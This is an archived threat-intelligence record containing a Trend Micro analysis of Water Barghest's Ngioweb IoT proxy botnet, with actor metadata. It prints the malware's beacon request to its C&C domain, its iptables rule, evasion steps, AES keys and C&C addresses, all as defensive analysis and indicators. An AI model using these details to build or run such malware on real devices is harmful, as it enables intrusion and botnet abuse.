{
	"id": "ced23879-0279-40fd-9cc8-1f7ae9d15c77",
	"created_at": "2026-04-06T00:17:40.215288Z",
	"updated_at": "2026-04-10T03:37:50.441692Z",
	"deleted_at": null,
	"sha1_hash": "79aeb957afda5a5e39a5095e4b28efed523574c6",
	"title": "Inside Water Barghest’s Rapid Exploit-to-Market Strategy for IoT Devices",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1665945,
	"plain_text": "Inside Water Barghest’s Rapid Exploit-to-Market Strategy for IoT\r\nDevices\r\nBy: Feike Hacquebord, Fernando Mercês 18/11/2024 Read time: 12 min (3342 words)\r\nPublished: 2024-11-18 · Archived: 2026-04-05 20:38:26 UTC\r\nIoT\r\nIn this blog entry, we discuss Water Barghest's exploitation of IoT devices, transforming them into profitable\r\nassets through advanced automation and monetization techniques.\r\nSummary\r\nWater Barghest, which comprised over 20,000 IoT devices by October 2024, monetizes IoT devices by\r\nexploiting vulnerabilities and quickly enlisting them for sale on a residential proxy marketplace.\r\nIts botnet uses automated scripts to find and compromise vulnerable IoT devices sourced from public\r\ninternet scan databases like Shodan.\r\nOnce IoT devices are compromised, the Ngioweb malware is deployed, which runs in memory and\r\nconnects to command-and-control servers to register the compromised device as a proxy.\r\nThe monetization process, from initial infection to the availability of the device as a proxy on a residential\r\nproxy marketplace, can take as little as 10 minutes, indicating a highly efficient and automated operation.\r\nThere is a big incentive for both espionage-motivated actors and financially motivated actors to set up proxy\r\nbotnets. These can serve as an anonymization layer, which can provide plausibly geolocated IP addresses to scrape\r\ncontents of websites, access stolen or compromised online assets, and launch cyber-attacks.\r\nExamples of proxy botnets set up by advanced persistent threat (APT) actors are the VPNFilter botnet and\r\nCyclops Blink, both deployed by Sandworm and disrupted by the Federal Bureau of Investigation (FBI) in 2018\r\nand 2022, respectively. Another example is the SOHO botnet alleged to be operated by a Chinese company called\r\nthe Beijing Integrity Technology Group; this botnet was disrupted in September 2024 by the FBI. 
The\r\ncybercriminal group Water Zmeu had a proxy botnet primarily consisting of Ubiquiti EdgeRouter devices, which\r\nwas used by nation state actor Pawn Storm (also known as APT28 and Forest Blizzard) for two years for their\r\nespionage campaigns.\r\nIn this blog entry, we discuss our findings on another proxy botnet we associate with Water Barghest’s intrusion\r\nset. This botnet was estimated to have more than 20,000 compromised Internet-of-Things (IoT) devices in October\r\n2024. The starting point of our discovery of Water Barghest’s intrusion set was our decade-old research into nation\r\nhttps://www.trendmicro.com/pt_br/research/24/k/water-barghest.html\r\nPage 1 of 13\n\nstate actor Pawn Storm. Many Ubiquiti EdgeRouter devices had been used by this nation state actor since April\r\n2022 in their espionage campaigns. Ubiquiti routers were the source of spear-phishing e-mails to numerous\r\ngovernment organizations all over the world; they were used as SMB reflectors in NTLMv2 hash relay attacks,\r\nand they served as proxies to send stolen credentials on phishing websites to upstream servers.\r\nIn January 2024, the FBI tried to stop these espionage campaigns by disrupting the third-party criminal router\r\nbotnet that Pawn Storm was using. We associate this router botnet that consisted primarily of Ubiquiti EdgeRouter\r\ndevices with the Water Zmeu intrusion set. During our investigation, we got our hands on a couple of the\r\nEdgeRouter devices that had been used by Pawn Storm, and we indeed found traces of espionage campaigns, and\r\nthe router malware of Water Zmeu. We also found mysterious processes running in memory only, called um or\r\nmm. These processes appeared to be instances of Ngioweb malware running in memory, and this led us to the\r\ndiscovery of the Ngioweb botnet of Water Barghest. 
Apparently, some cybercriminals and APT actors share\r\ncompromised infrastructure knowingly or unknowingly.\r\nFor more than five years, no significant publications appeared on the Ngioweb botnet of Water Barghest while\r\nthe botnet was up and running. This means that the actor group behind Water Barghest managed to keep a low\r\nprofile. Like several other cybercriminals, Water Barghest did not make headlines in the news because of their\r\ncareful operational security and high degree of automation. They had a steady income fueled by their\r\ncybercriminal activities, but they did not get the scrutiny they deserved. They quietly erased log files from their\r\nservers and made forensic analysis more difficult. They removed human error from their operations by automating\r\nalmost everything. They also removed financial traceability by using cryptocurrency for anonymous payments.\r\nHowever, they slipped up and suddenly had the spotlight pointed at them. This was because of a misjudgment, an\r\noperational mistake, or greed in the use of a vulnerability. One example of this is the widely publicized\r\nuse of the zero-day vulnerability that was used against Cisco IOS XE devices in October 2023. Tens of\r\nthousands of Cisco routers were affected, and naturally, this sparked the interest of the security industry. We, too,\r\nbecame interested in the ever-intriguing question of whodunnit, and ultimately, we solved it at the technical level:\r\nWe found that the attackers’ infrastructure that was used to compromise thousands of Cisco IOS XE routers\r\nbelonged to the five-year-old intrusion set of Water Barghest. 
This makes it very plausible that it was the Water\r\nBarghest group who had used the Cisco IOS XE device zero-day in October 2023.\r\nAnd yet, even without the seemingly reckless use of the Cisco IOS XE zero-day against tens of thousands of\r\nrouters, we would have discovered Water Barghest’s router botnet operations anyway through our decade-long\r\nresearch into Pawn Storm as mentioned above. A series of seemingly unrelated events led us to the discovery of\r\nthe way Water Barghest had automated every step between finding vulnerable routers and IoT devices on the\r\ninternet, exploiting these devices, uploading and executing malware on them, and then monetizing the\r\ncompromised assets for a steady income on an online marketplace of residential proxies.\r\nOne of the striking characteristics of the Water Barghest botnet is its high degree of automation, which will be\r\ndiscussed in the following section.\r\nWater Barghest’s automation\r\nAs far as we know, apart from acquiring IoT exploits, Water Barghest has automated each step between finding\r\nvulnerable IoT devices and putting them up for sale on a residential proxy marketplace (Figure 1). However, it all\r\nstarts with acquiring IoT device vulnerabilities: these are often n-days, but in at least one case Water\r\nBarghest utilized a zero-day. With a list of exploits in hand, Water Barghest uses search queries on a publicly\r\navailable Internet scan database like Shodan to find vulnerable devices and their IP addresses.\r\nAfter retrieving these IP addresses, Water Barghest uses a set of data-center IP addresses that are often\r\nlong-lived to try the exploits against potentially vulnerable IoT devices. When an exploit is successful, the\r\ncompromised IoT devices download a script that iterates through Ngioweb malware samples that are compiled for\r\ndifferent Linux architectures. 
When one of the samples runs successfully, Ngioweb runs in memory on the\r\nvictim’s IoT device. This means that the infection is not persistent; a reboot would remove the infection. When\r\nNgioweb runs, it will register with a command-and-control (C\u0026C) server. Oftentimes, within minutes the bot will\r\nreceive instructions to connect to one of the residential proxy provider’s 150 entry points (Figure 2). A speed test\r\nand name server test will follow, and the information will be sent to and listed on the marketplace. The whole\r\nprocedure between initial infection and making the bot available as a proxy on the marketplace may take no longer\r\nthan 10 minutes. This again shows the professionalism and maturity of this threat actor, who has been around for\r\nmore than five years.\r\nAt the time of writing, Water Barghest deploys about 17 workers on virtual private servers (VPS) that\r\ncontinuously scan routers and IoT devices for known vulnerabilities. The same workers are also used to upload\r\nNgioweb malware to freshly compromised IoT devices. Water Barghest has probably been using this mode of\r\noperation for years, with the worker IP addresses changing slowly over time. This setup allowed for a steady\r\nincome for Water Barghest for years.\r\nNgioweb malware evolution\r\n2018: Ramnit-powered Windows botnet\r\nThe Ngioweb malware strain goes back to 2018, when Check Point Research revealed it was being dropped by a\r\nRamnit Trojan. At the time, Ngioweb targeted computers using the Microsoft Windows operating system. The\r\nmalware was already designed for turning an infected machine into a malicious proxy server. A few samples even\r\ngo back to 2017, but the command-and-control (C\u0026C) domain that gives the malware its name was registered in\r\n2018: ngioweb[.]su. 
If you're curious about the .su top-level domain (TLD), it’s associated with the Soviet Union,\r\nand although the USSR doesn’t exist anymore, the TLD is still valid.\r\n2019: WordPress servers botnet\r\nIn 2019, Netlab researchers found the Linux variant of Ngioweb. The malware worked similarly to its previous\r\nWindows version, but it had domain generation algorithm (DGA) features added. According to Netlab, the botnet\r\nwas built mostly of web servers with WordPress installed, which suggests the threat actor could be exploiting a\r\nWordPress – or a WordPress plugin – vulnerability.\r\nOne of the parameters sent to the first-stage C\u0026C server was the ‘sv’ parameter (likely short for “software\r\nversion”), which contained the value 5003. Just like its Windows version, Ngioweb used two-stage C\u0026C servers\r\nand implemented its own binary protocol over TCP for communicating with the second-stage C\u0026C server.\r\n2020: IoT devices botnet\r\nIn 2020, Water Barghest changed their targets to IoT devices. We found Ngioweb samples compiled for many\r\ndifferent architectures. Additionally, Netlab published a blog entry and Intezer posted on X about a live Ngioweb\r\nbotnet. According to Netlab, the threat actor was exploiting nine different n-day vulnerabilities in IoT devices; this\r\nincluded NAS devices from QNAP and Netgear, but also D-Link devices, among others. The software version\r\ndefined in the ‘sv’ field was changed to 0005.\r\n2024: Expanded targets\r\nIn 2024, we saw the IoT botnet created by Water Barghest at its full potential. The processes we found running in\r\nseveral EdgeRouter devices turned out to be a new version of Ngioweb. It works very similarly to its previous\r\nversions. 
When running, the malware performs the following actions:\r\nInitializes function pointers at runtime, which makes static analysis harder.\r\nIgnores any ignorable signals received from the kernel.\r\nRenames itself to “[kworker/0:1]” in an attempt to look like a kernel thread in the process list.\r\nCloses the stdin, stdout, and stderr file descriptors to prevent any error reporting.\r\nDisables the kernel’s watchdog, effectively preventing it from rebooting the device.\r\nReads the contents of /etc/machine-id (the contents will be sent to the first-stage C\u0026C later).\r\nDecrypts its AES-256-ECB (no padding) encrypted configuration.\r\nGenerates and tries to resolve the DGA domains of the first-stage C\u0026C.\r\nIts main function is shown in Figure 3.\r\nThe encrypted configuration is usually at the beginning of the .data section. In the following sample the key is at\r\noffset 0x0c from the start of the .data section and the encrypted data blob is 512 bytes in size (Figure 4).\r\nThe encrypted configuration includes the ‘sv’ value, DGA seed and count, and C\u0026C URL path, among other\r\nsettings we didn’t fully analyze. Figure 5 shows a decrypted configuration with highlighted values of ‘sv’, DGA\r\nseed and count, C\u0026C port and C\u0026C URL path, respectively.\r\nWe’ve also created a Python script to decrypt the configuration of Ngioweb samples, which is available in our GitHub\r\nrepository. The following is an example output:\r\nPS D:\\ \u003e python ngioweb_config_extractor.py c267e0\r\n[DEBUG] AES key found at offset 0xc from .data section\r\nAES key (hex): db1f96b20679f9fb9cbd96b242ab8530102c0105b64c83c3ae544f87594a6fa9\r\nDGA seed (hex): 0221d333\r\nDGA count: 1000\r\nURL path: /jquery.js\r\nsv: 271a\r\nFor every generated domain the malware tries to resolve with A/AAAA requests, it also sends a TXT request\r\nexpecting a base64-encoded binary blob (Figures 6 and 7). 
\r\nUnfortunately, we didn’t finish the full analysis of how this binary blob is used. Nonetheless, the next stage is to\r\nsend a GET request to the C\u0026C server. Like its previous versions, this request is an unencrypted request at port\r\n443/tcp and contains some base64-encoded data that identifies the victim:\r\nGET /jquery.js?\r\nh=aWQ9MDEyMzQ1Njc4OWFiY2RlZiZ2PWFybXY3bCZzdj0yNzFhJnlic25xbndmYXR5anV0c2w=\r\nHTTP/1.1\\r\\n\r\nHost: ultradomafy.net\\r\\n\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0\\r\\n\r\nAccept: text/html\\r\\n\r\nConnection: close\\r\\n\r\n\\r\\n\r\nThe sample base64-decoded data is as follows:\r\nid=0123456789abcdef\u0026v=armv7l\u0026sv=271a\u0026ybsnqnwfatyjutsl\r\nid - first 16 characters from /etc/machine-id\r\nv - architecture of the infected device\r\nsv - software version (assumed)\r\n\u003crandom string with 16 lowercase letters\u003e\r\nIn this version, the ‘sv’ parameter changed to 271a.\r\nThe first-stage C\u0026C server response has the following format:\r\nHTTP/1.1 200 OK\\r\\n\r\nServer: openresty/1.19.9.1\\r\\n\r\nDate: Mon, 11 Mar 2024 23:23:47 GMT\\r\\n\r\nContent-Type: text/plain; charset=utf-8\\r\\n\r\nContent-Length: 8\\r\\n\r\nConnection: close\\r\\n\r\n\\r\\n\r\nWAIT 60\\n\r\nThe above response contains the WAIT command, which instructs the malware to wait a few seconds before\r\nquerying the C\u0026C server again. 
Its parameter is the number of seconds to wait (60 in the example).\r\nSupported commands are:\r\nWAIT\r\nCONNECT\r\nDISCONNECT\r\nCERT\r\nThis matches previous versions.\r\nDifferent child processes check whether the following iptables rule is present:\r\niptables -I INPUT -p tcp --tcp-flags RST RST -j DROP --sport 5000:55000\r\nIf the rule is not already active in netfilter, the malware adds it. We believe this is to prevent connection resets,\r\nensuring its communication channels remain open.\r\nAfter waiting 60 seconds, the malware might get a different answer, as shown in Figure 8:\r\nThis instructs the malware to connect to a second-stage C\u0026C, 195.154.43.182 in this case. We associate this\r\nsecond-stage IP address with one of the roughly 150 entry nodes of the residential proxy service.\r\nBefore publishing the new victim’s IP address for sale as a reverse proxy on the residential proxy marketplace’s\r\nwebsite, the malware downloads a large file containing random bytes from the second-stage C\u0026C (Figure 9).\r\nThis is to estimate the victim’s bandwidth, which we believe will be used to calculate the final price on the\r\nresidential proxy marketplace.\r\nIn this version, Water Barghest expanded Ngioweb’s list of targeted IoT devices, which now includes IoT devices\r\nfrom more brands, such as:\r\nCisco\r\nDrayTek\r\nFritz!Box\r\nLinksys\r\nNetgear\r\nSynology\r\nTenda\r\nWestern Digital\r\nZyxel\r\nWater Barghest has been targeting devices from the brands above with a range of n-day vulnerabilities and many\r\nold ones.\r\nResidential proxy marketplace\r\nIn our assessment, a significant part of the exit nodes that a particular residential proxy marketplace offers for rent\r\nbelong to devices that are infected with Ngioweb malware. 
In a couple of cases, we were able to verify that a fresh\r\nNgioweb infection resulted in the corresponding IP address being offered for rent on the marketplace’s website\r\nwithin a few minutes after the initial infection (Figure 10). The residential proxy provider accepts\r\ncryptocurrency payments only.\r\nAs far as we can tell, the proxies on the residential proxy marketplace (Figure 11) are back-connect proxies.\r\nNgioweb bots are instructed to connect to one of about 150 datacenter IP addresses we associate with the\r\nmarketplace that are also used as second-stage C\u0026C servers for Ngioweb-infected devices. Paying users of the residential\r\nproxy service can then connect to a temporary high TCP port on one of the 150 datacenter IP addresses, and then\r\nroute traffic through the Ngioweb bots.\r\nWith data provided by Team Cymru’s Real-time Threat Intelligence Platform, Pure Signal Recon, we were able to\r\nexplicitly enumerate a significant part of the marketplace’s residential proxy network over time and verify that\r\nNgioweb bots were added to the marketplace’s offerings within 10 minutes after initial infection.\r\nOutlook and conclusions\r\nFor years, mid-sized proxy botnets have existed without being disrupted or publicly documented. Examples are the\r\nbotnets we associate with the Water Barghest and Water Zmeu intrusion sets. The actor groups behind these\r\nintrusion sets have made refinements in their setup over the years and automated their operations to a high degree.\r\nEventually, some of these botnets were brought to the attention of the security industry. In the case of Water\r\nBarghest, this was because of the use of Water Barghest’s infrastructure to deploy a zero-day against Cisco IOS\r\nXE devices that infected tens of thousands of routers in October 2023. 
In the case of Water Zmeu, APT actor Pawn\r\nStorm’s use of this criminal botnet for espionage purposes motivated the FBI to disrupt the Water Zmeu-associated router botnet. Upon completing our write-up on Water Barghest's activities, we became aware of a\r\nLevelBlue blog entry that partially overlaps with our findings.\r\nAPT actors have also deployed their own dedicated IoT botnets, sometimes for years, before they were disrupted by the\r\nFBI and its partners. APT actors and financially motivated actors will continue to have an interest in building their\r\nown IoT botnets for anonymization purposes and espionage. They also will continue to use third-party botnets or\r\ncommercially available residential proxy services.\r\nWe expect that both the commercial market for residential proxy services and the underground market of proxies\r\nwill grow in the coming years, because the demand from APT actors and cybercriminal actor groups is high.\r\nProtecting against these anonymization layers is a challenge for many enterprises and government organizations\r\naround the world. Court-approved disruptions of proxy botnets will help put a dent in malign operations, but it is\r\nbetter to address the source of the problem: securing IoT devices is of paramount importance, and\r\nwhenever possible, these devices should not be exposed to incoming connections from the open internet.\r\nWhenever an IoT device accepts incoming connections on the open internet, commercial scanning services will\r\nquickly find it online, and malicious actors can find it too via bought or stolen access to these internet\r\nscanning services. Using internet scan data, the automated scripts of bad actors can quickly try known\r\nvulnerabilities, and possibly even zero-days, against the exposed IoT devices. 
In the case of Water Barghest, we\r\nhave seen that the time between exploiting an IoT device and putting it up for sale on a residential proxy\r\nmarketplace can be as little as 10 minutes. Therefore, it is important not to expose IoT devices to incoming\r\ninternet connections whenever it is not business-essential, and to put mitigations in place so that their infrastructure\r\ndoes not become part of the problem itself.\r\nTrend Micro Vision One Threat Intelligence\r\nTo stay ahead of evolving threats, Trend Micro customers can access a range of Intelligence Reports and Threat\r\nInsights within Trend Micro Vision One. Threat Insights helps customers stay ahead of cyber threats before they\r\nhappen and be better prepared for emerging threats. It offers comprehensive information on threat actors, their\r\nmalicious activities, and the techniques they use. By leveraging this intelligence, customers can take proactive\r\nsteps to protect their environments, mitigate risks, and respond effectively to threats.\r\nTrend Micro Vision One Intelligence Reports App [IOC Sweeping]\r\nNgioweb IoCs used in Water Barghest Campaigns\r\nTrend Micro Vision One Threat Insights App\r\nThreat Actors: Water Barghest\r\nEmerging Threats: Water Barghest’s Rapid Exploit-to-Market Strategy for IoT Devices\r\nHunting Queries\r\nTrend Micro Vision One Search App\r\nTrend Micro Vision One customers can use the Search App to match or hunt the malicious indicators mentioned\r\nin this blog post with data in their environment.\r\nDetection of Ngioweb Malware\r\nmalName:*NGIOWEB* AND eventName:MALWARE_DETECTION \r\nMore hunting queries are available for Vision One customers with Threat Insights Entitlement enabled.\r\nIndicators of Compromise (IOCs)\r\nThe full list of IOCs can be found here. 
For DGA-generated domains, please refer to this GitHub repository.\r\nYARA rules\r\nAs Ngioweb samples are highly obfuscated, an easy approach is to look for known AES keys in the .data section.\r\nHowever, it is possible to find samples without section headers. In this case, searching for the AES key in the\r\nwhole binary (or in a loadable segment) does the job. There are also samples with the AES key\r\nc91795b59248562e44d6c07526c7ab89dfe45344293703a94a3ae5ff02eab5a4 that we believe could be part of\r\nsome test, so we didn’t include them in our IOC list. The YARA rules can be found here.\r\nSource: https://www.trendmicro.com/pt_br/research/24/k/water-barghest.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/pt_br/research/24/k/water-barghest.html"
	],
	"report_names": [
		"water-barghest.html"
	],
	"threat_actors": [
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "7bd810cb-d674-4763-86eb-2cc182d24ea0",
			"created_at": "2022-10-25T16:07:24.1537Z",
			"updated_at": "2026-04-10T02:00:04.883793Z",
			"deleted_at": null,
			"main_name": "Sandworm Team",
			"aliases": [
				"APT 44",
				"ATK 14",
				"BE2",
				"Blue Echidna",
				"CTG-7263",
				"FROZENBARENTS",
				"G0034",
				"Grey Tornado",
				"IRIDIUM",
				"Iron Viking",
				"Quedagh",
				"Razing Ursa",
				"Sandworm",
				"Sandworm Team",
				"Seashell Blizzard",
				"TEMP.Noble",
				"UAC-0082",
				"UAC-0113",
				"UAC-0125",
				"UAC-0133",
				"Voodoo Bear"
			],
			"source_name": "ETDA:Sandworm Team",
			"tools": [
				"AWFULSHRED",
				"ArguePatch",
				"BIASBOAT",
				"Black Energy",
				"BlackEnergy",
				"CaddyWiper",
				"Colibri Loader",
				"Cyclops Blink",
				"CyclopsBlink",
				"DCRat",
				"DarkCrystal RAT",
				"Fobushell",
				"GOSSIPFLOW",
				"Gcat",
				"IcyWell",
				"Industroyer2",
				"JaguarBlade",
				"JuicyPotato",
				"Kapeka",
				"KillDisk.NCX",
				"LOADGRIP",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"ORCSHRED",
				"P.A.S.",
				"PassKillDisk",
				"Pitvotnacci",
				"PsList",
				"QUEUESEED",
				"RansomBoggs",
				"RottenPotato",
				"SOLOSHRED",
				"SwiftSlicer",
				"VPNFilter",
				"Warzone",
				"Warzone RAT",
				"Weevly"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "f9806b99-e392-46f1-9c13-885e376b239f",
			"created_at": "2023-01-06T13:46:39.431871Z",
			"updated_at": "2026-04-10T02:00:03.325163Z",
			"deleted_at": null,
			"main_name": "Watchdog",
			"aliases": [
				"Thief Libra"
			],
			"source_name": "MISPGALAXY:Watchdog",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "a52a8c65-f0f5-4f89-b8cd-d963c8f5e9d0",
			"created_at": "2024-11-20T02:00:03.669397Z",
			"updated_at": "2026-04-10T02:00:03.778091Z",
			"deleted_at": null,
			"main_name": "Water Barghest",
			"aliases": [],
			"source_name": "MISPGALAXY:Water Barghest",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "730dfa6e-572d-473c-9267-ea1597d1a42b",
			"created_at": "2023-01-06T13:46:38.389985Z",
			"updated_at": "2026-04-10T02:00:02.954105Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"Pawn Storm",
				"ATK5",
				"Fighting Ursa",
				"Blue Athena",
				"TA422",
				"T-APT-12",
				"APT-C-20",
				"UAC-0001",
				"IRON TWILIGHT",
				"SIG40",
				"UAC-0028",
				"Sofacy",
				"BlueDelta",
				"Fancy Bear",
				"GruesomeLarch",
				"Group 74",
				"ITG05",
				"FROZENLAKE",
				"Forest Blizzard",
				"FANCY BEAR",
				"Sednit",
				"SNAKEMACKEREL",
				"Tsar Team",
				"TG-4127",
				"STRONTIUM",
				"Grizzly Steppe",
				"G0007"
			],
			"source_name": "MISPGALAXY:APT28",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "e3767160-695d-4360-8b2e-d5274db3f7cd",
			"created_at": "2022-10-25T16:47:55.914348Z",
			"updated_at": "2026-04-10T02:00:03.610018Z",
			"deleted_at": null,
			"main_name": "IRON TWILIGHT",
			"aliases": [
				"APT28 ",
				"ATK5 ",
				"Blue Athena ",
				"BlueDelta ",
				"FROZENLAKE ",
				"Fancy Bear ",
				"Fighting Ursa ",
				"Forest Blizzard ",
				"GRAPHITE ",
				"Group 74 ",
				"PawnStorm ",
				"STRONTIUM ",
				"Sednit ",
				"Snakemackerel ",
				"Sofacy ",
				"TA422 ",
				"TG-4127 ",
				"Tsar Team ",
				"UAC-0001 "
			],
			"source_name": "Secureworks:IRON TWILIGHT",
			"tools": [
				"Downdelph",
				"EVILTOSS",
				"SEDUPLOADER",
				"SHARPFRONT"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "ae320ed7-9a63-42ed-944b-44ada7313495",
			"created_at": "2022-10-25T15:50:23.671663Z",
			"updated_at": "2026-04-10T02:00:05.283292Z",
			"deleted_at": null,
			"main_name": "APT28",
			"aliases": [
				"APT28",
				"IRON TWILIGHT",
				"SNAKEMACKEREL",
				"Group 74",
				"Sednit",
				"Sofacy",
				"Pawn Storm",
				"Fancy Bear",
				"STRONTIUM",
				"Tsar Team",
				"Threat Group-4127",
				"TG-4127",
				"Forest Blizzard",
				"FROZENLAKE",
				"GruesomeLarch"
			],
			"source_name": "MITRE:APT28",
			"tools": [
				"Wevtutil",
				"certutil",
				"Forfiles",
				"DealersChoice",
				"Mimikatz",
				"ADVSTORESHELL",
				"Komplex",
				"HIDEDRV",
				"JHUHUGIT",
				"Koadic",
				"Winexe",
				"cipher.exe",
				"XTunnel",
				"Drovorub",
				"CORESHELL",
				"OLDBAIT",
				"Downdelph",
				"XAgentOSX",
				"USBStealer",
				"Zebrocy",
				"reGeorg",
				"Fysbis",
				"LoJax"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d2516b8e-e74f-490d-8a15-43ad6763c7ab",
			"created_at": "2022-10-25T16:07:24.212584Z",
			"updated_at": "2026-04-10T02:00:04.900038Z",
			"deleted_at": null,
			"main_name": "Sofacy",
			"aliases": [
				"APT 28",
				"ATK 5",
				"Blue Athena",
				"BlueDelta",
				"FROZENLAKE",
				"Fancy Bear",
				"Fighting Ursa",
				"Forest Blizzard",
				"G0007",
				"Grey-Cloud",
				"Grizzly Steppe",
				"Group 74",
				"GruesomeLarch",
				"ITG05",
				"Iron Twilight",
				"Operation DealersChoice",
				"Operation Dear Joohn",
				"Operation Komplex",
				"Operation Pawn Storm",
				"Operation RoundPress",
				"Operation Russian Doll",
				"Operation Steal-It",
				"Pawn Storm",
				"SIG40",
				"Sednit",
				"Snakemackerel",
				"Sofacy",
				"Strontium",
				"T-APT-12",
				"TA422",
				"TAG-0700",
				"TAG-110",
				"TG-4127",
				"Tsar Team",
				"UAC-0028",
				"UAC-0063"
			],
			"source_name": "ETDA:Sofacy",
			"tools": [
				"ADVSTORESHELL",
				"AZZY",
				"Backdoor.SofacyX",
				"CHERRYSPY",
				"CORESHELL",
				"Carberp",
				"Computrace",
				"DealersChoice",
				"Delphacy",
				"Downdelph",
				"Downrage",
				"Drovorub",
				"EVILTOSS",
				"Foozer",
				"GAMEFISH",
				"GooseEgg",
				"Graphite",
				"HATVIBE",
				"HIDEDRV",
				"Headlace",
				"Impacket",
				"JHUHUGIT",
				"JKEYSKW",
				"Koadic",
				"Komplex",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"LoJack",
				"LoJax",
				"MASEPIE",
				"Mimikatz",
				"NETUI",
				"Nimcy",
				"OCEANMAP",
				"OLDBAIT",
				"PocoDown",
				"PocoDownloader",
				"Popr-d30",
				"ProcDump",
				"PythocyDbg",
				"SMBExec",
				"SOURFACE",
				"SPLM",
				"STEELHOOK",
				"Sasfis",
				"Sedkit",
				"Sednit",
				"Sedreco",
				"Seduploader",
				"Shunnael",
				"SkinnyBoy",
				"Sofacy",
				"SofacyCarberp",
				"SpiderLabs Responder",
				"Trojan.Shunnael",
				"Trojan.Sofacy",
				"USB Stealer",
				"USBStealer",
				"VPNFilter",
				"Win32/USBStealer",
				"WinIDS",
				"Winexe",
				"X-Agent",
				"X-Tunnel",
				"XAPS",
				"XTunnel",
				"Xagent",
				"Zebrocy",
				"Zekapab",
				"carberplike",
				"certutil",
				"certutil.exe",
				"fysbis",
				"webhp"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434660,
	"ts_updated_at": 1775792270,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/79aeb957afda5a5e39a5095e4b28efed523574c6.pdf",
		"text": "https://archive.orkl.eu/79aeb957afda5a5e39a5095e4b28efed523574c6.txt",
		"img": "https://archive.orkl.eu/79aeb957afda5a5e39a5095e4b28efed523574c6.jpg"
	}
}